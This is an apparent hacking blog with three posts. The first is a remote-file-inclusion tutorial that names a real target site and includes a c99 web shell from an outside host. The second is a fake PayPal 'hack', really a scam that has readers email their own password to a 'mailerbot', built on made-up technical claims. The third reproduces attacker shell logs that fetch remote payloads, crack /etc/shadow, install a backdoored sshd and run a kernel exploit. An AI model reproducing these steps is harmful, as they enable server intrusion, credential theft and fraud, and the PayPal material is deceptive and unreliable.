Sunday, April 10, 2011
Anu
Do you want to Telnet or SSH to your
website? In simple terms, Telnet and SSH allows you to remotely control
your webserver so that you can easily change the file permissions of
your web pages, create new files and do more.
Showing posts with label Web Server Hacking. Show all posts
Showing posts with label Web Server Hacking. Show all posts
Sunday, April 10, 2011
Thursday, December 23, 2010
How to hack a Web Server in a minute...?
Remote file inclusion is basically aone of the most common vulnerability found in web application. Thistype of vulnerability allows the Hacker or attacker to add a remotefile on the web server. If the attacker gets successful in performingthe attack he/she will gain access to the web server and hence canexecute any command on it.
Searching the Vulnerability
Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one
www.Targetsite.com/index.php?page=Anything
To find the vulnerability the hacker will most commonly use the following Google Dork
“inurl:index.php?page=”
This will show all the pages which has “index.php?page=”in their URL, Now to test whether the website is vulnerable to Remotefile Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com
Lets say that the target website is http://www.cbspk.com
So the hacker url will become
http://www.cbspk.com/v2/index.php?page=http://www.google.com
If after executing the command thehomepage of the google shows up then then the website is vulnerable tothis attack if it does not come up then you should look for a newtarget. In my case after executing the above command in the address barGoogle homepage shows up indicating that the website is vulnerable tothis attack
Nowthe hacker would upload the shells to gain access.
The most commonshells used are c99 shell or r57 shell. I would use c99 shell. You candownload c99 shell from the link below:
http://www.ziddu.com/download/13093723/c99shell.zip.html
The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is
http://h1.ripway.com/rafaybaloch/c99.txt
Now here is how a hacker would execute the following command to gain access
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?
Rememberto add “?” at the end of url or else the shell will not execute.
Nowthe hacker is inside the website and he could do anything with it
Thanks...
How to hack paypal a/c?
This is how to hack the paypal accounts hurry before it's to late and paypal chanes the bots again.
Thisis the new bot and everything you need to know to get into paypal. Mybuddy who works for paypal told me about the new bots and all so yah
NOTE: remember that it might notwork the first time so try it a few times and hopfully it will work.
Thisis the new bot and everything you need to know to get into paypal. Mybuddy who works for paypal told me about the new bots and all so yah
NOTE: remember that it might notwork the first time so try it a few times and hopfully it will work.
HOW TO HACK INTO PAYPAL ACCOUNT!!!
The following complete hacking tutorial contains materials that may notbe suitable for irresponsible internet users, reader discretion isadvised!
1) Thehacking method is based on a secretly discovered security flaw in thePayPal (www.paypal.com) mailing address confirmation system. It willonly work BEFORE PayPal discovers this serious security flaw and fixesit. Take your action FAST!
2) This method works for any body withPayPal accounts with CONFIRMED MAILING ADDRESSES. It will never workfor PayPal user without a confirmed mailing address.
3) By strictlyfollowing instructions in the following tutorial, you'll gain unlimitedaccess to various PayPal accounts with confirmed mailing addresses. Usethose accounts AT YOUR OWN RISK. Youre responsible for your action!
4)When you use PayPal, NEVER log on to sites that do not start EXACTLYwith www.paypal.com even if it contains the term "paypal" in it.
PayPalis the latest victim of internet hackers. Despite the company'sseemingly perfect security system, a serious security flaw in theADDRESS CONFIRMATION PROCESS of PayPal's members accounts has beendiscovered by a few experienced hackers from Russia. The hackingprocess has been simplified a while ago and it was revealed on aRussian language hacking website.
PayPal was immediately alerted ofthis security flaw after the Russian language hacking tutorial waspublished on the website, but in order to prevent its customers fromlosing trust in internet banking, PayPal chose NOT to alert itscustomers of this security flaw and has then secretly BANNED numerousonline articles that contained information of this security flaw.
However,it has been confirmed that due to technical difficulty, PayPal has NOTyet fixed the problem and at this moment right now, anyone can STILLhack into a great number of PayPal accounts with confirmed addresses.
Toinform users worldwide of this problem, I've attached an Englishversion of the hacking process. Remember, to get the whole thing towork, you MUST STRICTLY follow the instructions and have a PayPal account with a confirmed mailing address!
HACKING PROCESS:
EveryPayPal member is identified by his/her Email and the majority of thePayPal members use Hotmail. After completion of the mailing addressconfirmation process, usually by adding a CREDIT CARD, PayPalautomatically sends the user's address confirmation info to a mailerbotassociated with the user's Email, in most cases, it's Hotmail mailerbot.
Thesecurity flaw occurs RIGHT HERE! Both Yahoo and Hotmail mailerbots canbe confused by a random user and sends out information saved on itsserver to that user.
To get PayPal account information of numerous random PayPal users from a Hotmail mailerbot, you have to do the following:
1) Log into your www.paypal.com homepage, and click on Profile, and then click on Street Address under Account Information.
2) Find the Address whose status is Home, and if it says confirmed, then please read on.
Basically,A Confirmed Address is any address at which you receive your creditcard statement. If you receive a credit card bill at this address, youcan confirm it by entering your credit card information.
Thisinformation will only be used to confirm your address.
Your card willnot be charged by PayPal. So,if your Home address is NOT confirmed, then FOLLOW THE INSTRUCTIONS ONPAYPAL AND ADD A CREDIT CARD TO CONFIRM YOUR MAILING ADDRESS.
3) Okay, There are two bots which this will work for.
I. If you want an account with hotmail email, then:
Log in to your paypal email account and send an Email to:
paypalresponsebot035@hotmail.com (This is the hotmail mailerbot described above) (NEW) (Other mailer bots are not active now)
I. If you want an account with hotmail email, then:
Log in to your paypal email account and send an Email to:
paypalresponsebot035@hotmail.com (This is the hotmail mailerbot described above) (NEW) (Other mailer bots are not active now)
In the subject line, write:
789bot4*5%8verif-0e24 (To confuse the hotmail mailerbot)
789bot4*5%8verif-0e24 (To confuse the hotmail mailerbot)
In the email body, please write exactly 11 lines, which MUST BE as follows:
In line 1: Subject-Type: ?text/plain="+1"?
In line 2: charset=us-english
(Tomake the reply readable in your language so put you own language hereotherwise it might come in a laguage you don't understand)
(Tomake the reply readable in your language so put you own language hereotherwise it might come in a laguage you don't understand)
In line 3: botbody*78#9 confirmation0e24.hotmail.com
(To confuse the mailerbot)
(To confuse the mailerbot)
In line 4: p38ylec00rm::s%%(a href=http://www.paypal.com%%)
(To make the mailerbot start retrieving information acquired from PayPal.)
(To make the mailerbot start retrieving information acquired from PayPal.)
In line 5: Your primary email at paypal
(Toretrieve information from PayPal, The mailerbot now needs an Emailwhich is the primary Email of a PayPal account with a confirmed mailingaddress, you have to use your own Email as a bait Email and you?ll needto receive info of other accounts from this Email too, so be sure thisis your primary Email at PayPal.)
(Toretrieve information from PayPal, The mailerbot now needs an Emailwhich is the primary Email of a PayPal account with a confirmed mailingaddress, you have to use your own Email as a bait Email and you?ll needto receive info of other accounts from this Email too, so be sure thisis your primary Email at PayPal.)
In line 6: start (retrieve > 07)
(To activate the mailerbot's retrieval function at the highest speed)
(To activate the mailerbot's retrieval function at the highest speed)
In line 7: verify#8% (*value= = float)
(This will trick him to send it to your email adress instead of the administrators)
(This will trick him to send it to your email adress instead of the administrators)
In line 8: Your PayPal password
(Nowyou have to enter your paypal password to confuse the bot so it thinksyour the administrator of paypal and it can send you the emails andpasswords of people.)
(Nowyou have to enter your paypal password to confuse the bot so it thinksyour the administrator of paypal and it can send you the emails andpasswords of people.)
In line 9: #searchppagend72hrlog
(to get info from PayPal members who had their addresses confirmed in the last 72 hours)
(to get info from PayPal members who had their addresses confirmed in the last 72 hours)
In line 10: send#%*idR20334-tsa-0583
(This will make the mailerbot send all the info to your email)
(This will make the mailerbot send all the info to your email)
In line 11: (#%7*tmbot*="+098")
(this covers you trail so they cant find you. Last step!)
(this covers you trail so they cant find you. Last step!)
Ifyou specifically follow the instructions above, you'll have email,passwords and all sorts of information of PayPal users who had theirmailing addresses confirmed over the last 72 hours.
Thanks...
Friday, December 17, 2010
How to hack a Web Server?
Did u want to hack into a Web Server?
If YES! thn i'll give you the way to hack into any Web Server. A simple pair of commands can do it for you, so, lets check it...
STARTING WITH BASH SHELL:
w
The first command they ran was "w" which was probably to see who wasonline and if root was sitting at the console or not and OF COURSEcheck the uptime maybe to take a guess as to when the last reboot was.This helps find an exploit that the machine may not have installed.Though this tech works better on Windows where EVERY patch needs areboot.
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvfThey used wget to grab a file on their own website which was a hacked version of a common application used by admin.
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cdThey remove the downloaded file so the admin doesn't find.
../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rmEditing the header file.
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..Installing the backdoored app.
./configure --without-x
make
make install
mkdir /lib/javaRemoving the actual applications to make room for their hacked copy.
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbinA mild **** up
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
wCheck if anyone is going to notice a reboot
reboot
Lets Over.....
Now here is the all above commands in a pair :
w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot
Ok
Now here i provide you some other pair of commands, lets check them n ....
.bash_history
Code:
w
passwd
Code:
w
cd /var/tmp
ls
hostname -f
mkdir " "
cd " "
Code:
ls
pwd
wget esteticu.org/mremap_pte
chmod +x mremap_pte
./mremap_pte
Code:
w
rm -rf mremap_pte
wget www.partyzone.go.ro/hide.tgz
tar xzvf hide.tgz
./hide root 0 0
Code:
ls
rm -rf hide
rm -rf hide.tgz
wget ideo.go.ro/psy6667.tgz
tar xzvf psy6667.tgz
rm -rf psy6667.tgz
cd psybnc
chmod +x psybnc
mv psybnc backup
PATH="./"
backup
ls
rm -rf backup
kilall -9 psybnc
rm -rf psybnc
exit
Code:
export PATH='.'
psybnc
ls
exit
Code:
export PATH='.'
crond
exit
Code:
ww
Code:
w
cd /var/tmp
ls
cd " "
ls
killall -9 psybnc
rm -rf psbnc
uname -a
Code:
wget www.skimy.go.ro/psy.tgz
tar xzvf psy.tgz
cd psybnc
sh
ls
killall -9 psybnc
rm -rf psybnc
rm -rf backup
cd ..
ls
rm -rf psy.tgz
rm -rf psybnc
Code:
wget artist.idilis.ro/xpl.tgz
tar xzvf xpl.tgz
rm -rf xpl.tgz
mv mech ".. .bot"
cd ".. .bot"
sh
ha ha ha haaaaaa
i think tht u can understand them...
Thanks...
Subscribe to:
Posts (Atom)
